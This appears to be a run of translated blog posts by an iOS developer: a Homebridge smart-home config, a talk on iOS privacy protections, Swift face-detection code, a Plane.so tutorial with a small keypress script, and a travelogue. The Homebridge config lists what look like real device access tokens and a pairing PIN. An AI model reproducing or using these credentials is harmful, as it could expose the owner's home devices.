+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+
{
+ "bridge":{
+ "name":"Homebridge",
+ "username":"CC:22:3D:E3:CE:30",
+ "port":51826,
+ "pin":"123-45-568"
+ },
+ "accessories":[
+ {
+ "accessory":"MijiaCamera",
+ "name":"Mi Camera",
+ "ip":"192.168.0.105",
+ "token":"6d304e6867384b704b4f714d45314a34"
+ },
+ {
+ "accessory":"XiaomiAirPurifier3",
+ "name":"Xiaomi Air Purifier",
+ "did":"270033668",
+ "ip":"192.168.0.108",
+ "token":"5c3eeb03065fd8fc6ad10cae1f7cce7c",
+ "pm25_breakpoints":[
+ 5,
+ 12,
+ 35,
+ 55
+ ]
+ }
+ ],
+ "platforms":[
+ {
+ "platform":"MiFanPlatform",
+ "deviceCfgs":[
+ {
+ "type":"MiDCVariableFrequencyFan",
+ "ip":"192.168.0.106",
+ "token":"dd1b6f582ba6ce34f959bbbc1c1ca59f",
+ "fanName":"room fan",
+ "fanDisable":false,
+ "temperatureName":"room temperature",
+ "temperatureDisable":true,
+ "humidityName":"room humidity",
+ "humidityDisable":true,
+ "buzzerSwitchName":"fan buzzer switch",
+ "buzzerSwitchDisable":true,
+ "ledBulbName":"fan led switch",
+ "ledBulbDisable":true
+ }
+ ]
+ },
+ {
+ "platform":"yeelight",
+ "name":"Yeelight"
+ }
+ ]
+}
+
For your reference!
The Mijia appliances I used are as taught above. I didn’t try the ones I don’t have. You can search on npm (homebridge-plugin XXX English name) and follow the similar logic to install and configure them!
Here are some homebridge plugins I found but haven’t tried (no guarantee they work):
Additionally, you can go to “Settings” -> “Control Center” -> “Customize” to add the “Home” app, allowing you to quickly operate HomeKit from the drop-down control center!
After connecting everything to HomeKit, the only word is “Awesome”! The response to switching is faster, the only downside is that I don’t have a home hub, so I can’t control it remotely. This concludes the advanced Homebridge tutorial, thank you for reading.
Back to the beginning of the article, after adding everything to HomeKit, we can seamlessly use the iOS ≥ 13 Shortcuts automation feature.
Do you want to study how the Homebridge plugin is made? It seems very interesting! So if there is a HomeBridge plugin that doesn’t meet your operational needs or a plugin is broken and you can’t find a replacement, just wait for me to study it!
There is another smart home platform Homeassistant that can be flashed into the Raspberry Pi for use (Note: A 2A power supply is required to start); I also installed Homeassistant to play with. It has a full GUI interface, and you can connect appliances with just a few clicks; I will study it in-depth later. It feels like another Mi Home platform, but if you have many different manufacturers’ IoT components, it is more suitable to use this.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Apple’s privacy principles and the adjustments to privacy protection features in iOS over the years
Theme by slidego
Supplementary updates on iOS 17 privacy-related adjustments from the previous presentation.
Safari will automatically remove tracking parameters from URLs (e.g., fbclid
, gclid
…)
https://zhgchg.li/post/1?gclid=124
will become https://zhgchg.li/post/1
after clicking.fbxxx
, gcxxx
, etc., will be removed, but utm_
is retained; it’s uncertain if the official iOS 17 or future iOS 18 will further enhance this.Developers need to declare the use of User Privacy, and also require any used SDK to provide its Privacy Manifest.
*Additionally, third-party SDK Signature has been added
XCode 15 can generate a Privacy Report through the Manifest for developers to set App privacy settings on the App Store.
To prevent the misuse of certain Foundation APIs that could potentially lead to fingerprinting, Apple has started to regulate some Foundation APIs; a declaration of usage is required in the Manifest.
Currently, the most affected API is UserDefault, which requires a declaration.
1
+2
+3
+
Starting in Fall 2023, if you upload a new app or app update to App Store Connect that uses an API requiring a declaration (including content from third-party SDKs), and you do not provide an approved reason in the app's privacy list, you will receive a notification. Starting in Spring 2024, to upload new apps or app updates to App Store Connect, you will need to specify the approved reason in the app's privacy list to accurately reflect how your app uses the respective API.
+
+If the current scope of approved reasons does not cover a use case for an API requiring a declaration, and you believe this use case directly benefits your app users, please let us know.
+
APIs that send tracking information need to declare the domain in the privacy manifest .xprivacy and can only initiate network requests after user consent for tracking; otherwise, all network requests to this domain will be intercepted by the system.
You can check if the Tracking Domain is intercepted using the XCode Network tool:
Currently, Facebook and Google’s Tracking Domains are detected and need to be listed as Tracking Domains and require permission.
Therefore, please note that FB/Google data statistics may significantly drop after iOS 17, as data will not be received if permission is not asked or tracking is not allowed; based on past implementations of asking for tracking permission, about 70% of users will click not allow.
Fingerprinting is still prohibited.
I am honored to participate in the MOPCON speech, but it is a pity that it has been changed to an online live broadcast due to the pandemic, and I cannot meet more new friends. The theme of this speech is “The Past and Present of iOS Privacy and Convenience,” mainly to share Apple’s principles on privacy and the functional adjustments iOS has made over the years based on these privacy principles.
The Past and Present of iOS Privacy and Convenience | Pinkoi, We Are Hiring!
In recent years, developers or iPhone users should be familiar with the following feature adjustments:
If you are not familiar with Apple’s privacy principles, you might even wonder why Apple has been constantly opposing developers and advertisers in recent years. Many features that everyone is used to have been blocked.
After going through “ WWDC 2021 — Apple’s privacy pillars in focus “ and “ Apple privacy white paper — A Day in the Life of Your Data “, it became clear that we have unknowingly leaked a lot of personal privacy, allowing advertisers or social media to profit immensely, infiltrating our daily lives.
Referencing the Apple privacy white paper and rewriting it, let’s take the fictional character Harry as an example to illustrate how privacy is leaked and the potential harm it can cause.
First is the usage record on Harry’s iPhone.
On the left is the web browsing history: You can see visits to websites related to cars, iPhone 13, and luxury goods.
On the right are the installed apps: There are investment, travel, social, shopping, and baby monitor apps.
Harry’s offline life
Offline activities leave records in places such as invoices, credit card transaction records, dashcams, etc.
You might think, how could different websites, different apps (even without logging in), and offline activities possibly allow a service to link all the data together?
The answer is: technically, it is possible, and it “might” or “has already” happened partially.
As shown in the image above:
It is technically feasible; so who are the third parties behind all the websites and apps?
Large companies like Facebook and Google earn significant revenue from personal ads; many websites and apps also integrate Facebook and Google SDKs… so it’s hard to say. Often, we don’t even know which third-party ad and data collection services websites and apps use, secretly recording our every move.
Let’s assume that all of Harry’s activities are secretly collected by the same third party, then in its eyes, Harry’s profile might look like this:
On the left is personal information, possibly from website registration data or delivery data; on the right are behavior and interest tags based on Harry’s activity records.
In its eyes, it might know Harry better than Harry knows himself; this data can be used on social media to make users more addicted; used in advertising, it can stimulate Harry to overconsume or create a birdcage effect (e.g., recommending you buy new pants, then you buy shoes to match, then socks… it never ends).
If you think the above is already scary enough, there’s something even scarier:
Having your personal information and knowing your financial status… the potential for malicious acts is unimaginable, such as kidnapping, theft…
Mainly through legal constraints; it’s hard to ensure services comply 100% of the time, and there are many malicious programs on the internet, making it difficult to guarantee that services won’t be hacked, causing data leaks; in short, “ if someone wants to do evil, it’s technically feasible, relying solely on regulations and corporate conscience is not enough.”
Moreover, we are often “forced” to accept privacy terms, unable to authorize individual privacy settings. Either we don’t use the service at all, or we use it but have to accept all privacy terms; privacy terms are also not transparent, so we don’t know how our data will be collected and used, and we don’t know if a third party is collecting our data without our knowledge.
Additionally, Apple has mentioned that minors’ personal privacy is often collected by services without the consent of their guardians.
Knowing the harm caused by personal privacy leaks, let’s look at Apple’s privacy principles.
Excerpted from the Apple Privacy White Paper, Apple’s ideal is not to completely block but to balance. For example, in recent years, many people have installed AD Block to completely block ads, which is not what Apple wants to see; because if completely disconnected, it’s hard to provide better services.
Steve Jobs said at the 2010 All Things Digital Conference:
I believe people are smart, some people want to share more data than others. Ask them every time, annoy them until they tell you to stop asking, let them know exactly how you are going to use their data. — translated by Chun-Hsiu Liu
Apple believes privacy is a fundamental human right
Understanding the harm of personal privacy leaks and Apple’s privacy principles, let’s look at the technical means; we can see the adjustments iOS has made over the years to protect personal privacy.
As mentioned earlier
🈲, in iOS >= 11, Safari has implemented Intelligent Tracking Prevention (WebKit)
Enabled by default, the browser actively identifies and blocks third-party cookies used for tracking and advertising; and with each iOS version, the identification program is continuously strengthened to prevent omissions.
Using Third-Party Cookies to track users across websites is basically no longer feasible on Safari.
🈲,iOS >= 15 Private Relay
Especially after Third-Party Cookies were banned, more and more services are adopting this method. Apple is also aware of this… Fortunately, in iOS 15, even the IP information is obfuscated for you!
The Private Relay service will first randomly send the user’s original request to Apple’s Ingress Proxy, then randomly dispatch it to the partner CDN’s Egress Proxy, and finally, the Egress Proxy will request the target website.
The entire process is encrypted and can only be decrypted by the chip in your iPhone. Only you know both the IP and the target website of the request simultaneously. Apple’s Ingress Proxy only knows your IP, the CDN’s Egress Proxy only knows Apple’s Ingress Proxy IP and the target website, and the website only knows the CDN’s Egress Proxy IP.
From an application perspective, all devices in the same region will use the same shared CDN’s Egress Proxy IP to request the target website. Therefore, the website cannot use the IP as Fingerprint information anymore.
For technical details, refer to “WWDC 2021 — Get ready for iCloud Private Relay”.
Private Relay Test Image
Apps can use URLSessionTaskMetrics
to analyze Private Relay connection records.
To digress, the method of using IP addresses to obtain Fingerprints to identify users can no longer be used.
🈲,iOS >= 7 prohibits access to Device UUID,
Use IDentifierForAdvertisers/IDentifierForVendor instead
🈲,iOS >= 14.5 IDentifierForAdvertisers requires user consent before use
After iOS 14.5, Apple has strengthened the restrictions on accessing IDFA. Apps need to ask for user permission to track before obtaining the IDFA UUID; without asking or without permission, the value cannot be obtained.
Preliminary survey data from market research companies show that about 70% of users (some say 90% in the latest data) do not allow tracking to access IDFA, which is why people say IDFA is dead!
iOS apps can use canOpenURL
to detect if a specific app is installed on the user’s phone.
🈲,iOS >= 9 requires setting in the app before use; cannot detect arbitrarily.
iOS ≥ 15 adds a restriction, allowing a maximum of 50 other app schemes.
Apps linked on or after iOS 15 are limited to a maximum of 50 entries in the LSApplicationQueriesSchemes key.
As mentioned earlier
In the early days, iOS Safari’s cookies and App WebView’s cookies could communicate, allowing data exchange between websites and apps.
The method involves embedding a 1-pixel WebView component in the app’s background to secretly read Safari cookies.
🈲,iOS >= 11 prohibits sharing cookies between Safari and App WebView
If you need to obtain Safari cookies (e.g., using website cookies to log in directly), you can use the SFSafariViewController
component; however, this component forces a prompt window and cannot be customized, ensuring that users are not unknowingly tracked.
As mentioned earlier, iOS ≥ 15 has been obfuscated by Private Relay.
Using the clipboard to transfer cross-platform information, as Apple cannot disable clipboard usage across apps, but it can prompt the user.
⚠️ iOS >= 14 adds clipboard access warnings
Starting from iOS ≥ 16, if the user does not actively perform a paste action, the app’s attempt to read the clipboard will trigger a prompt window, and the user needs to allow it for the app to read the clipboard information.
UIPasteBoard’s privacy change in iOS 16
_Here, I want to mention the privacy panic regarding the clipboard in iOS 14. For more details, you can refer to my previous article “iOS 14 Clipboard Privacy Panic: The Dilemma Between Privacy and Convenience”. _
Although we cannot rule out the possibility of reading the clipboard for data theft, more often, our app needs to provide a better user experience:
Before implementing Deferred Deep Link, when we guide users to install the app from the website, opening the app after installation will only open the homepage by default. A better user experience should be opening the app to the corresponding page where the user left off on the website.
To achieve this functionality, there needs to be a way to transfer data between the website and the app. As mentioned in the article, other methods have been banned, and currently, only the clipboard can be used as a medium for storing information (as shown above).
Including Firebase Dynamic Links and the latest version of Branch.io (previously Branch.io used IP Address Fingerprint to achieve this) also use the clipboard for Deferred Deep Link.
For implementation, you can refer to my previous article: iOS Deferred Deep Link Implementation (Swift)
In general, if it is for Deferred Deep Link, the clipboard information will only be read the first time the app is opened or when returning to the app. It will not be read during use or at odd times, which is worth noting.
A better approach is to use UIPasteboard.general.detectPatterns
to detect if the clipboard data is what we need before reading it.
After iOS ≥ 15, the clipboard prompt has been optimized. If it is the user’s own paste action, the prompt will no longer appear!
As mentioned earlier, Apple’s privacy principle hopes for a balance rather than completely blocking users from services.
In Safari, the feature that blocks Intelligent Tracking Prevention is Private Click Measurement (WebKit) used to measure advertising effectiveness without compromising personal privacy.
The specific process is as shown above. When a user clicks an ad on site A and goes to site B, a Source ID (to identify the same user) and Destination information (target site) will be recorded in the browser. When the user completes a conversion on site B, a Trigger ID (representing what action) will also be recorded in the browser.
These two pieces of information will be combined and sent to sites A and B after a random 24 to 48 hours to get the advertising effectiveness.
Everything is handled on-device by Safari, and protection against malicious clicks is also provided by Safari.
You can use SKAdNetwork (requires application to join Apple) similar to Private Click Measurement, which will not be elaborated here.
It is worth mentioning that Apple is not working behind closed doors; SKAdNetwork is currently at version 2.0. Apple continues to collect feedback from developers and advertisers to balance personal privacy control and continuously optimize SDK functionality.
Here, I sincerely wish that Deferred Deep Link can be integrated with the SDK, as we aim to enhance user experience without intending to invade personal privacy.
For technical details, refer to “WWDC 2021 — Meet privacy-preserving ad attribution”.
All apps supporting third-party login on iOS ≥ 13 must implement Sign in with Apple, otherwise, they cannot be successfully listed on the App Store.
iOS ≥ 15 iCloud+ users support Hide My Email
Similar to Sign in with Apple, virtual emails generated by Apple replace real emails. After receiving an email, Apple will forward it to your real email, thus protecting your email information.
Similar to a 10-minute email but more powerful; as long as you don’t disable it, the virtual email address is yours permanently; there is no limit to the number of new addresses you can create, and it’s unclear how Apple prevents abuse.
Settings -> Apple ID -> Hide My Email
Apps must explain on the App Store what user data will be tracked and how it will be used .
For detailed information, refer to: “App privacy details on the App Store”.
Starting from iOS ≥ 14, location and photo access can be more finely controlled. You can authorize access to only certain photos or allow location access only while using the app.
Starting from iOS ≥ 15, the CLLocationButton button is added to enhance user experience. It allows obtaining the current location through user clicks without asking for permission or consent. This button cannot be customized and can only be triggered by user actions.
iOS ≥ 15, added personal privacy usage prompts, such as: clipboard, location, camera, microphone
iOS ≥ 15, can export a report of all apps’ privacy-related usage and network activity for the past 7 days.
.ndjson
plain text file, it is not easy to view directly; you can first download the “ Privacy Insights “ app from the App Store to view the report.As mentioned in the news, WeChat indeed secretly reads photo information in the background when the app is launched.
Additionally, I also caught a few other Chinese apps doing sneaky things, so I directly disabled all their permissions in settings.
If it weren’t for this feature exposing them, who knows how long our data would have been stolen!
After understanding the adjustments to privacy features over the years, let’s revisit Apple’s privacy principles:
Returning to the initial technical means of piecing together Harry’s correlation diagram, the connections between websites or apps are blocked, leaving only the clipboard, which will prompt.
For service registration and third-party login information, you can use Sign in with Apple and hide my email features to prevent leaks; or use more native iOS apps.
Offline activities might be protected by using Apple Card to prevent privacy leaks?
No one has the chance to piece together Harry’s activity profile anymore.
Therefore, “human-centric” is the term I would use to describe Apple’s philosophy. Going against the commercial market requires a strong belief. Related to this, “technology-centric” is the term I would use for Google, as Google always creates many geeky tech projects. Lastly, “business-centric” is the term I would use for Facebook, as FB pursues commercial gains on many levels.
In addition to adjustments for privacy features, iOS has continuously enhanced features to prevent phone addiction over the past few years, introducing “Screen Time Report,” “App Usage Limits,” “Focus Mode,” and more; helping everyone break free from phone addiction.
Live a brilliant life in the real world!
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Practical Application of Vision
Before Optimization V.S. After Optimization — Marry Me APP
With the recent iOS 12 update, I noticed the new CoreML machine learning framework and found it quite interesting. I began to think about how to incorporate it into our current products.
The article on trying out CoreML is now available: Automatically Predict Article Categories Using Machine Learning, Even Train the Model Yourself
CoreML provides the ability to train and reference machine learning models for text and images in an app. Initially, I thought of using CoreML for face recognition to address the issue of cropping heads or faces in the app, as shown on the left in the image above. Faces can easily be cut off due to scaling and cropping if they appear at the edges.
After some online research, I realized my knowledge was limited, and this functionality was already available in iOS 11 through the “Vision” framework, which supports text detection, face detection, image comparison, QR code detection, object tracking, and more.
In this case, I utilized the face detection feature from Vision and optimized it as shown on the right in the image; finding faces and cropping around them.
Demo APP
As shown in the completed image above, it can mark the positions of faces in the photo.
P.S. It can only mark “faces,” not the entire head including hair 😅
This program mainly consists of two parts. The first part addresses the issue of white space when resizing the original image to fit into an ImageView. In simple terms, we want the ImageView size to match the image size. Directly inserting the image can cause misalignment as shown below.
You might consider changing the ContentMode to fill, fit, or redraw, but this may cause distortion or cropping of the image.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+
let ratio = UIScreen.main.bounds.size.width
+// Here, I set the alignment of my UIImageView to 0 on both sides, with an aspect ratio of 1:1
+
+let sourceImage = UIImage(named: "Demo2")?.kf.resize(to: CGSize(width: ratio, height: CGFloat.leastNonzeroMagnitude), for: .aspectFill)
+// Using KingFisher's image resizing feature, based on width, with flexible height
+
+imageView.contentMode = .redraw
+// Using redraw to fill the contentMode
+
+imageView.image = sourceImage
+// Assigning the image
+
+imageViewConstraints.constant = (ratio - (sourceImage?.size.height ?? 0))
+imageView.layoutIfNeeded()
+imageView.sizeToFit()
+// Here, I adjust the constraints of the imageView. For more details, refer to the complete example at the end of the document
+
Here is the translated content:
The above is the processing for images.
The cropping part uses Kingfisher to assist us, and can also be replaced with other libraries or custom methods.
Next, let’s focus on the code directly.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+
if #available(iOS 11.0, *) {
+ // Supported after iOS 11
+ let completionHandle: VNRequestCompletionHandler = { request, error in
+ if let faceObservations = request.results as? [VNFaceObservation] {
+ // Recognized faces
+
+ DispatchQueue.main.async {
+ // Operate on UIView, switch back to the main thread
+ let size = self.imageView.frame.size
+
+ faceObservations.forEach({ (faceObservation) in
+ // Coordinate system conversion
+ let translate = CGAffineTransform.identity.scaledBy(x: size.width, y: size.height)
+ let transform = CGAffineTransform(scaleX: 1, y: -1).translatedBy(x: 0, y: -size.height)
+ let transRect = faceObservation.boundingBox.applying(translate).applying(transform)
+
+ let markerView = UIView(frame: transRect)
+ markerView.backgroundColor = UIColor.init(red: 0/255, green: 255/255, blue: 0/255, alpha: 0.3)
+ self.imageView.addSubview(markerView)
+ })
+ }
+ } else {
+ print("No faces detected")
+ }
+ }
+
+ // Recognition request
+ let baseRequest = VNDetectFaceRectanglesRequest(completionHandler: completionHandle)
+ let faceHandle = VNImageRequestHandler(ciImage: ciImage, options: [:])
+ DispatchQueue.global().async {
+ // Recognition takes time, so it is executed in the background thread to avoid freezing the current screen
+ do{
+ try faceHandle.perform([baseRequest])
+ }catch{
+ print("Throws: \(error)")
+ }
+ }
+
+} else {
+ //
+ print("Not supported")
+}
+
The main thing to note is the coordinate system conversion part; the results recognized are in the original coordinates of the image; we need to convert it to the actual coordinates of the ImageView outside to use it correctly.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+
let ratio = UIScreen.main.bounds.size.width
+// Here, because I set the left and right alignment of my UIImageView to 0, with a ratio of 1:1, details can be found in the complete example at the end
+
+let sourceImage = UIImage(named: "Demo")
+
+imageView.contentMode = .scaleAspectFill
+// Use scaleAspectFill mode to fill
+
+imageView.image = sourceImage
+// Assign the original image, we will operate on it later
+
+if let image = sourceImage, #available(iOS 11.0, *), let ciImage = CIImage(image: image) {
+ let completionHandle: VNRequestCompletionHandler = { request, error in
+ if request.results?.count == 1, let faceObservation = request.results?.first as? VNFaceObservation {
+ // One face
+ let size = CGSize(width: ratio, height: ratio)
+
+ let translate = CGAffineTransform.identity.scaledBy(x: size.width, y: size.height)
+ let transform = CGAffineTransform(scaleX: 1, y: -1).translatedBy(x: 0, y: -size.height)
+ let finalRect = faceObservation.boundingBox.applying(translate).applying(transform)
+
+ let center = CGPoint(x: (finalRect.origin.x + finalRect.width/2 - size.width/2), y: (finalRect.origin.y + finalRect.height/2 - size.height/2))
+ // Here is the calculation of the middle point position of the face range
+
+ let newImage = image.kf.resize(to: size, for: .aspectFill).kf.crop(to: size, anchorOn: center)
+ // Crop the image according to the center point
+
+ DispatchQueue.main.async {
+ // Operate on UIView, switch back to the main thread
+ self.imageView.image = newImage
+ }
+ } else {
+ print("Detected multiple faces or no faces detected")
+ }
+ }
+ let baseRequest = VNDetectFaceRectanglesRequest(completionHandler: completionHandle)
+ let faceHandle = VNImageRequestHandler(ciImage: ciImage, options: [:])
+ DispatchQueue.global().async {
+ do{
+ try faceHandle.perform([baseRequest])
+ }catch{
+ print("Throws: \(error)")
+ }
+ }
+} else {
+ print("Not supported")
+}
+
The logic is similar to marking the position of a face, the difference is that the avatar part has a fixed size (e.g. 300x300), so we skip the first part that requires the Image to fit the ImageView.
Another difference is that we need to calculate the center point of the face area and use this center point as the reference for cropping the image.
The red dot is the center point of the face area.
The second before the blink is the original image position.
The code has been uploaded to Github: Click here
For any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Introduction to the use of Plane.so project management tool with Scurm process
At my previous company Pinkoi, I first experienced the power of Asana project management tool. Whether it was internal project management or collaboration across teams, Asana played a role in decoupling dependencies between individuals and tasks, enhancing collaboration efficiency.
In my previous company, all teams, from product teams to operations, business teams (such as HRBP, Finance, Marketing, BD, etc.), had a publicly accessible Project as a single collaboration entry point across teams. When other teams needed assistance, they could directly create a Task (which could also be from a Template Task) in that Project (usually with a Need Help! Section). The team would then take over the Task internally for execution.
For cross-team collaboration with the operations team, such as procurement and recruitment processes, tasks could be directly created and progress tracked through Asana. For collaboration with business teams, such as marketing campaign planning, tasks requiring engineering assistance, and more.
Without Asana or similar project management tools:
Returning to project management, Asana provides flexible, multidimensional, and automated project management tools that can be customized according to requirements.
There are many ways to use Asana. The following are just a few examples of use cases. It is recommended to determine your needs before applying relevant Asana examples.
Asana’s Taiwan distributor also provides comprehensive educational training. If interested, you can contact them.
(This article is not sponsored)
Example 1
Team Project
Team Scrum Project
In addition to the main team Project, a Scrum Project is created to manage tasks (Asana tasks can be added to multiple Projects simultaneously) and review the execution content of each Sprint.
Example 2
Example two uses Sections to differentiate Sprints, creating a new Section each week for tasks and using Labels to mark other statuses.
As mentioned earlier, the scenarios with Asana project management tools at my previous company Pinkoi. In the past few months, returning to an environment without project management tools has made me realize the importance of tools for work efficiency.
The current environment does not have a more modern project management tool, based on procurement (expense control), internal control issues (pure intranet), and personal data audit restrictions (must be on-premises), so Asana cannot be directly introduced for use.
Due to the above environmental limitations, we can only start with open-source and self-hosted project management tools. The solutions found are nothing more than: Redmine, OpenProject, Taiga… Several solutions were tried, but the results were not as expected, lacking functionality and having unfriendly UI/UX. It wasn’t until I accidentally found a project management tool called Plane.so, which was newly launched in January 2023.
By the way, I recommend this website, which includes many services that support self-hosting:
awesome-selfhosted A list of Free Software network services and web applications which can be hosted on your own servers awesome-selfhosted.net
That’s enough talk, let’s get to the main content.
This document is divided into:
You can refer to the next section “ Plane.so Docker Self-Hosted Setup Record “ for Docker self-hosted setup instructions.
Plane was founded in 2022 and is a startup company from Delaware, USA, and India. Currently, most of the developers observed on Linkedin and Github are in India. The company has raised $4 million in seed funding (invested by OSS Capital).
Currently, Plane ranks first in the Github project management category, is open-source using the AGPL-3.0 license, was launched in January 2023, and is still in the development phase, with no official release yet.
Please note: ⚠️ Open-source does not mean free ⚠️ **, just like Github and Gitlab, there are many project management tools similar to Github, such as Asana, Jira, Clickup, but there is no product good enough to compete with Gitlab’s open-source products yet. Plane aims to be the Gitlab of project management tools.
You can refer to the Plane Product Roadmap on the official website:
Open Source Repo:
Plane offers cloud-based services starting at $0, with Pro providing more frameworks and integration, as well as automation features.
Community Edition (referred to as CE by the official), Self-Hosted version, also starting at $0, if you want to use advanced features, you still need to purchase Pro but can support Self-Hosted.
Plane.so differs from Asana’s multidimensional flexibility, but Plane is composed of the following frameworks for project management:
Currently, the free version and CE (Self-Hosted) version do not have this feature.
We can quickly and freely start using the Plane Cloud version directly:
Plane | Simple, extensible, open-source project management tool. Open-source project management tool to manage issues, sprints, and product roadmaps with peace of mind. app.plane.so
After creation, you can switch between different Workspaces on the Workspace dropdown menu and also access Workspace Settings from here:
One of the most important settings is Members, where we need to invite team members to join the Workspace:
Enter Projects to view all public and joined Projects:
APP-1
)In the top right corner of the Project, click on “…” to:
Other settings:
Click “Create Issue” to start creating an Issue:
Login optimization
, App
… (settings will be introduced later).W22
, S22
, 2024-05
… (settings will be introduced later).Create Issue Content using AI:
After creating the Issue, clicking on it in the list will bring up the Issue Preview window, where you can click to expand into the Issue Full-Screen page:
Click to expand into the Issue Full Screen Detail page:
Currently, only Email notifications are available:
Plane Documentation - Plane Plane is an extensible, open source project and product management tool. It allows users to start with a basic task… docs.plane.so
The above is the usage introduction for version 0.20-Dev as of May 25, 2024. The official team is still actively developing new features and optimizing user experience. The functionality mentioned above may be improved in the future. Please refer to the latest version for the best experience.
During the development of the project, there may be bugs and user experience issues. Please be patient with the Plane.so team. If you have any questions, feel free to report them below:
W12
or use the date format like 2024-05-27
.The above is just an example of a workflow. Please note that there is no perfect process, only the one that suits your team. Refer to the structure provided by Plane.so to unleash creativity and find the best project management approach.
Plane.so has a clean frontend-backend separation architecture, providing a comprehensive API. After creating API Tokens from Workspace Settings, you can use the API by including the API Request Header X-API-Key
. For API Endpoint request methods, refer to the official API documentation.
However, since the official documentation is not yet complete and many request methods are not listed, the quickest way is to open the browser tools, check the Network requests, and see how the official site makes API requests. Then, apply your own Key to use it.
Opened an Issue with the official & followed the Source Code, feeling that the chances of fixing it are quite low, because it didn’t consider the need to select the language from the beginning, so it directly binds the Enter Event on the keyboard to submit the Comment.
Browser Extension Workaround:
Here is a workaround JavaScript script I wrote to hook the Enter event.
This is a shared extension for Chromium, other browsers can also search for similar JavaScript Inject tools.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+
document.addEventListener('keydown', function(event) {
+ if (event.key === 'Enter' || event.keyCode === 13) { // event.keyCode is for older browsers
+ const focusedElement = document.activeElement;
+ const targetButtons = focusedElement.parentElement.parentElement.parentElement.parentElement.parentElement.querySelectorAll('button[type="submit"]');
+if (targetButtons.length > 0 && targetButtons[0].textContent.trim().toLowerCase() === "comment") {
+ console.log("HIT");
+ // Focus the active element and place the cursor at the end
+ focusedElement.focus();
+ if (window.getSelection) {
+ var range = document.createRange();
+ var selection = window.getSelection();
+ range.selectNodeContents(focusedElement);
+ range.collapse(false);
+ selection.removeAllRanges();
+ selection.addRange(range);
+ }
+ event.stopImmediatePropagation();
+}
+ }
+},true);
+
Go back to Plane.so (refresh) and open an Issue to test the Comment function.
Because Plane.so is still in the development stage and the product is very new, it is uncertain whether there are security issues. It is recommended not to upload any sensitive data to avoid data leakage in case of major issues with the service, or use Self-Hosted to self-host for local intranet use.
For any questions and suggestions, please feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Record and travel information for a 5-day free and easy trip to Tokyo in June 2023, following the Kansai region trip last month.
Following the previous post “Travelogue] 2023 Kansai Region & 🇯🇵 First Landing”, I quickly returned to Japan a week later.
You may wonder why not stay in Japan and take the Shinkansen from Osaka to Tokyo directly? The reason is that the Tokyo trip was actually the originally planned overseas trip, while the Kansai region trip was just an impromptu decision.
Plus, I didn’t want to change flight tickets, accommodations, and have to Work From Japan for a week (I believe in pure enjoyment when traveling), so I returned to Taiwan after the Kansai region trip.
Looking back, it was a good decision to return; because during the week I returned to Taiwan, Japan was hit by a super typhoon, causing flooding, Shinkansen suspension, and overcrowded train stations; if I had been in Japan that week, there wouldn’t have been many places to go. (Finally, not the rain god anymore!)
Myself, current colleague (Sean), and former colleague (James Lin); where Sean and James are university classmates. (Yes, the industry is that small XD)
For information on entering Japan and other insights, please refer to the previous post.
Although the Tokyo trip was the planned overseas arrangement, we only talked about it until the Kansai region plans were almost finalized. It was only then that we started planning and executing the Tokyo trip.
For places I haven’t been to, I am still an ENFP spontaneous type, finding everywhere fresh and exciting; so I mainly took care of the general direction of flights, accommodations, and transportation; we decided on attractions based on where other travel companions wanted to go or where we felt like visiting at the moment.
Joy, mainly handled by Sean & James, we planned to buy tickets in advance for Disneyland (Ocean), Yokohama Gundam, and Shibuya Sky; so we bought the tickets two weeks before departure.
If you don’t buy them in advance, there won’t be any available slots on-site.
This time, I brought the remaining Japanese yen from the last trip, around $60,000, and ended up with around $5,000 left.
Because my Visa card couldn’t be used at a drugstore in Shinjuku, I had to pay over $10,000 in cash for cosmetics, and I decided to spend all the remaining cash.
Also, I almost couldn’t return; when buying a ticket from Tokyo Station to Narita Airport, my card couldn’t be used, and I had to scramble to gather enough cash for the fare.
Since this trip was only for 5 days and time was limited, we prioritized early departure and late return flights; we directly checked SkyScanner for flights with suitable timings.
Taipei <-> Narita
EVA Air BR 184
08:00 TPE -> NRT 12:256/22 EVA Air BR 195
20:40 NRT -> TPE 23:20
$17,086
There was a mistake here, you shouldn’t buy three plane tickets for one person, each person should buy their own ticket because using a credit card to purchase tickets will provide travel insurance.
Later, I found out that flying from Songshan to Haneda wasn’t much more expensive and was more convenient Orz.
Travel insurance: Done
Similarly, purchase a 5-day unlimited data SIM card on KKDAY for about $500.
Same as the previous post, I used the Suica card directly on my iPhone, but my friend with an Android phone had to buy the Welcome Suica limited-time card (ask at Narita Airport, that’s the only option available).
Since this trip was only to Tokyo, I looked for a hotel where we could stay for four days without changing locations. As it was close to the travel date, there were no available rooms at the Tokyo branches of Toyoko Inn or APA; I had to search on Agoda for a hotel near the middle of Tokyo with access to train and subway stations.
Located at Shiodome Station, providing direct access to Odaiba or Shinjuku.
To go to other places, you need to walk to Shimbashi Station (about 10 minutes), and from Shimbashi to Tokyo Station is another 10 minutes (1-2 stops away).
Reasonably convenient, reasonably priced, with good reviews. The room was clean, comfortable, and not too small. Since there were three of us, the room had two beds and a sofa bed (which was as comfortable as a regular bed).
3 people total NT$23,894
This trip was special because our flight was at 8 a.m., and we were all departing from Taipei. We needed to catch a 6 a.m. flight, so we had to leave home around 4-5 a.m. Considering the excitement of going out and the difficulty in falling asleep, we wouldn’t have gotten much rest.
